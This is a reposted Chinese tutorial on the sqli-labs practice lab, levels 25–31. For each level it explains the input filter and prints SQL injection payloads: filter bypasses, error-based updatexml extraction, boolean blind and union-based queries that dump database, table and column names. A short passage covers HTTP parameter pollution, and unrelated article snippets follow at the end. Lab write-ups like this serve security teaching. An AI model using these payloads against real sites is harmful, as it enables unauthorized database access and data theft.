以sqlilabs靶场为例,讲解SQL注入攻击原理【25-31关】

2024-06-03 02:20

本文主要是介绍以sqlilabs靶场为例,讲解SQL注入攻击原理【25-31关】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

【Less-25】

首先分析源码

发现把 SQL语句中的 or、and 替换成了空格,这就导致无法使用之前的sql注入方式。

解决方案:用 && 代替 and , 用 || 代替 or , 而且&在url中有特殊含义,如果直接使用会有问题,所以还需要对&&进行urlencode编码处理。

?id=1' and 1=1 -- aaa改为
?id=1' && 1=1 -- aaa  # 由于&在url中有特殊含义,如果直接使用会有问题,所以还需要对&&进行urlencode编码处理。最终为:?id=1'%26%26 1=1 -- aaa 

结果正常显示,不在报SQL语句错误。

获取数据库名之后,按照步骤获取数据表名,却出现了错误。

写入的information_schema 被换成了 infmation,中间的or被替换了""。

解决方案:information_schema  写成 infoorrmation 。

完整步骤:

#第一步 获取数据库名?id=1'|| updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- aaa #也可以使用&&的urlencode#第二步 获取数据表名?id=1'|| updatexml(1,concat(0x7e,(SELECT table_name from infoorrmation_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- aaa#第三步 获取数据表字段名(将其中的and 转换为&&的urlencode)?id=1'|| updatexml(1,concat(0x7e,(SELECT group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() %26%26 table_name='emails' ),0x7e),1)-- aaa

最后渗透结果如下:

【Less-26】

首先分析源码

可以发现and、or、-- 、#、空格都被转义了,说明在注入的时候就不能用这些了。

尝试用 && 或 || 来代替 and、or ,用'1'='1 代替之前的注释--

# 注入获取数据库名?id=1' ||updatexml(1,concat(0x7e,(select database()),0x7e),1) || '1'='1

发现select database()中间的空格被替换了,此时更改代码,用括号代替空格。

# 获取数据库名?id=1' ||updatexml(1,concat(0x7e,(select(database())),0x7e),1) || '1'='1

结果正常显示数据库名

其他步骤基本和Less-25相似,如下:

# 获取数据表名?id=1' ||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),0x7e),1) || '1'='1# 获取数据字段
?id=1' ||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database()%26%26(table_name='emails'))),0x7e),1) || '1'='1

结果:

【Less-27】

源码分析:

较比Less-26,Less-27注释的更多,可以发现-- 、#、select、union、+、空格都被转义了,说明在注入的时候就不能用这些了。

解题步骤与Less-26类似,最大的区别就是不要直接用select,可以用sElect或其他大小写组合的名字代替。

完整步骤如下:

# 获取数据库名?id=1' || updatexml(1,concat(0x7e,(select(database())),0x7e),1) || '1'='1# 获取数据表名,可以用sElect 代替select ,用%0a代替空格?id=1'||updatexml(1,concat(0x7e,(sElect(group_concat(table_name))from%0ainformation_schema.tables%0awhere%0atable_schema=database()%0a),0x7e),1) || '1'='1# 获取数据字段
?id=1' || updatexml(1,concat(0x7e,(sElect(group_concat(column_name))from(information_schema.columns)where(table_schema=database()%26%26(table_name='emails'))),0x7e),1) || '1'='1

结果为:

【Less-28】

源码分析:

和上一题类似,也有诸多注释,特别是不能使用select和union,而且大小写都不行。还有注入的是id 用了括号和引号。

解决方案:采用盲注的方式解决

# 获取数据库名字的长度?id=1')and(length(database())=8)and('1')=('1# 获取数据库的具体名字,可以使用BurpSuite工具
?id=1')and(ascii(substr(database(),1,1))=115)and('1')=('1# 获取数据表名
?id=1')and(ascii(substr((select%0atable_name%0afrom%0ainformation_scheam.tables%0awhere%0atable_schema=database()%0alimit%0a0,1),1,1)))=101%0aand('1')=('1# 获取数据字段
?id=1')and(ascii(substr((select%0acolumn_name%0afrom%0ainformation_schema.columns%0awhere%0atbale_name='emails'%0alimit%0a0,1),1,1)))=105%0aand('1')=('1

这里可以使用BurpSuite软件进行参数更改,实现快速找到对应的值。

获取的数据库名为Security,数据表名emails。

【Less-29】

简单的单引号闭合,具体的解决方案如下:

# 获取数据库?id=-1' union select 1,2,database() -- aaa# 获取数据表?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- aaa# 获取数据字段?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails' -- aaa

【Less-30】

简单的双引号闭合,具体的解决方案如下:

# 获取数据库?id=-1" union select 1,2,database() -- aaa# 获取数据表?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- aaa# 获取数据字段?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails' -- aaa

 【Less-31】

简单的双引号和括号闭合,具体的解决方案如下:

# 获取数据库?id=-1") union select 1,2,database() -- aaa# 获取数据表?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- aaa# 获取数据字段?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails' -- aaa

 Ps:这里的Less-29 到 Less-31 讲解的是一个参数污染的问题,因为需要配置两个环境,一个tomcat(jsp),一个Apache(php),首先请求会经过jsp过滤然后再传给php,然后将经过php服务器处理完之后又返回给isp服务器,从而显示到客户端,这里我们可以利用参数污染的方式给他两个传参,他会将第一个传参给jsp处理,而第二个传参交给了php处理。

关于参数污染的文章可以参考:https://www.cnblogs.com/wjrblogs/p/12966636.html

这篇关于以sqlilabs靶场为例,讲解SQL注入攻击原理【25-31关】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1025770

相关文章

Java编译生成多个.class文件的原理和作用

《Java编译生成多个.class文件的原理和作用》作为一名经验丰富的开发者,在Java项目中执行编译后,可能会发现一个.java源文件有时会产生多个.class文件,从技术实现层面详细剖析这一现象... 目录一、内部类机制与.class文件生成成员内部类(常规内部类)局部内部类(方法内部类)匿名内部类二、

MySQL双主搭建+keepalived高可用的实现

《MySQL双主搭建+keepalived高可用的实现》本文主要介绍了MySQL双主搭建+keepalived高可用的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,... 目录一、测试环境准备二、主从搭建1.创建复制用户2.创建复制关系3.开启复制,确认复制是否成功4.同

MyBatis 动态 SQL 优化之标签的实战与技巧(常见用法)

《MyBatis动态SQL优化之标签的实战与技巧(常见用法)》本文通过详细的示例和实际应用场景,介绍了如何有效利用这些标签来优化MyBatis配置,提升开发效率,确保SQL的高效执行和安全性,感... 目录动态SQL详解一、动态SQL的核心概念1.1 什么是动态SQL?1.2 动态SQL的优点1.3 动态S

Mysql表的简单操作(基本技能)

《Mysql表的简单操作(基本技能)》在数据库中,表的操作主要包括表的创建、查看、修改、删除等,了解如何操作这些表是数据库管理和开发的基本技能,本文给大家介绍Mysql表的简单操作,感兴趣的朋友一起看... 目录3.1 创建表 3.2 查看表结构3.3 修改表3.4 实践案例:修改表在数据库中,表的操作主要

C# WinForms存储过程操作数据库的实例讲解

《C#WinForms存储过程操作数据库的实例讲解》:本文主要介绍C#WinForms存储过程操作数据库的实例,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、存储过程基础二、C# 调用流程1. 数据库连接配置2. 执行存储过程(增删改)3. 查询数据三、事务处

Python中随机休眠技术原理与应用详解

《Python中随机休眠技术原理与应用详解》在编程中,让程序暂停执行特定时间是常见需求,当需要引入不确定性时,随机休眠就成为关键技巧,下面我们就来看看Python中随机休眠技术的具体实现与应用吧... 目录引言一、实现原理与基础方法1.1 核心函数解析1.2 基础实现模板1.3 整数版实现二、典型应用场景2

Java的IO模型、Netty原理解析

《Java的IO模型、Netty原理解析》Java的I/O是以流的方式进行数据输入输出的,Java的类库涉及很多领域的IO内容:标准的输入输出,文件的操作、网络上的数据传输流、字符串流、对象流等,这篇... 目录1.什么是IO2.同步与异步、阻塞与非阻塞3.三种IO模型BIO(blocking I/O)NI

mysql出现ERROR 2003 (HY000): Can‘t connect to MySQL server on ‘localhost‘ (10061)的解决方法

《mysql出现ERROR2003(HY000):Can‘tconnecttoMySQLserveron‘localhost‘(10061)的解决方法》本文主要介绍了mysql出现... 目录前言:第一步:第二步:第三步:总结:前言:当你想通过命令窗口想打开mysql时候发现提http://www.cpp

MySQL大表数据的分区与分库分表的实现

《MySQL大表数据的分区与分库分表的实现》数据库的分区和分库分表是两种常用的技术方案,本文主要介绍了MySQL大表数据的分区与分库分表的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有... 目录1. mysql大表数据的分区1.1 什么是分区?1.2 分区的类型1.3 分区的优点1.4 分

MySQL错误代码2058和2059的解决办法

《MySQL错误代码2058和2059的解决办法》:本文主要介绍MySQL错误代码2058和2059的解决办法,2058和2059的错误码核心都是你用的客户端工具和mysql版本的密码插件不匹配,... 目录1. 前置理解2.报错现象3.解决办法(敲重点!!!)1. php前置理解2058和2059的错误